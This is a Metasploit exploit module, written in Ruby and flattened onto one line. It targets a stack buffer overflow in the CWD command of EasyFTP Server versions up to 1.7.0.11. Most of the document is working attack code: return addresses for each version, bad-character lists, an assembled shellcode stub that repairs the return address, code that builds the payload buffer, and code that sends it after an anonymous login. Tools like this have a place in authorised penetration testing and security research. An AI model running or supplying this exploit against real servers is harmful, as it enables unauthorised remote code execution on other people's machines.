## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) super(update_info(info, 'Name' => 'EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 and earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which leads to a stack based buffer overflow. EasyFTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability. After version 1.7.0.12, this package was renamed "UplusFtp". This exploit utilizes a small piece of code that I\'ve referred to as 'fixRet'. This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by 'fixing' the return address post-exploitation. See references for more information. }, 'Author' => [ 'Paul Makowski ', # original version 'jduck' # various fixes, remove most hardcoded addresses ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '62134' ], [ 'BID', '38262' ], [ 'URL', 'http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/' ], [ 'URL', 'http://paulmakowski.wordpress.com/2010/04/19/metasploit-plugin-for-easyftp-server-exploit' ], [ 'URL', 'http://seclists.org/bugtraq/2010/Feb/202' ], [ 'URL', 'http://code.google.com/p/easyftpsvr/'], [ 'URL', 'https://tegosecurity.com/etc/return_overwrite/RCE_easy_ftp_server_1.7.0.2.zip' ] ], 'Privileged' => false, 'Payload' => { # Total bytes able to write without crashing program (505) - length of fixRet (25) - slack space (30) = 450 'Space' => 505 - 30 - 25, 'BadChars' => "\x00\x0a\x2f\x5c", # from: http://downloads.securityfocus.com/vulnerabilities/exploits/38262-1.py 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ [ 'Windows Universal - v1.7.0.2', { 'Ret' => 0x00404121 } ], # call edi - from ftpbasicsvr.exe [ 'Windows Universal - v1.7.0.3', { 'Ret' => 0x00404121 } ], # call edi - from ftpbasicsvr.exe [ 'Windows Universal - v1.7.0.4', { 'Ret' => 0x00404111 } ], # call edi - from ftpbasicsvr.exe [ 'Windows Universal - v1.7.0.5', { 'Ret' => 0x004040ea } ], # call edi - from ftpbasicsvr.exe [ 'Windows Universal - v1.7.0.6', { 'Ret' => 0x004040ea } ], # call edi - from ftpbasicsvr.exe [ 'Windows Universal - v1.7.0.7', { 'Ret' => 0x004040ea } ], # call edi - from ftpbasicsvr.exe [ 'Windows Universal - v1.7.0.8', { 'Ret' => 0x004043ca } ], # call edi - from ftpbasicsvr.exe [ 'Windows Universal - v1.7.0.9', { 'Ret' => 0x0040438a } ], # call edi - from ftpbasicsvr.exe [ 'Windows Universal - v1.7.0.10', { 'Ret' => 0x0040435a } ], # call edi - from ftpbasicsvr.exe [ 'Windows Universal - v1.7.0.11', { 'Ret' => 0x0040435a } ], # call edi - from ftpbasicsvr.exe ], 'DisclosureDate' => 'Feb 16 2010', 'DefaultTarget' => 0)) end def check connect disconnect if (banner =~ /BigFoolCat/) # EasyFTP Server has undergone several name changes return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit connect_login # If the payload's length is larger than 233 bytes then the payload must be bisected with the return address and later patched. # Explanation of technique: http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/ # NOTE: # This exploit jumps to edi, which happens to point at a partial version of # the 'buf' string in memory. The fixRet below fixes up the code stored on the # stack and then jumps there to execute the payload. The value in esp is used # with an offset for the fixup. fixRet_asm = %q{ mov ecx, 0xdeadbeef mov edi, esp sub edi, 0xfffffe14 mov [edi], ecx add edi, 0xffffff14 jmp edi } fixRet = Metasm::Shellcode.assemble(Metasm::Ia32.new, fixRet_asm).encode_string buf = '' print_status("Prepending fixRet...") buf << fixRet buf << make_nops(0x20 - buf.length) #buf << "C" * (0x20 - buf.length) print_status("Adding the payload...") buf << payload.encoded # Backup the original return address bytes buf[1,4] = buf[268,4] print_status("Overwriting part of the payload with target address...") buf[268,4] = [target.ret].pack('V') # put return address @ 268 bytes # NOTE: SEH head at offset 256 also gets smashed. That is, it becomes what is at fs:[0] .. print_status("Sending exploit buffer...") send_cmd( ['CWD', buf] , false) # this will automatically put a space between 'CWD' and our attack string handler disconnect end end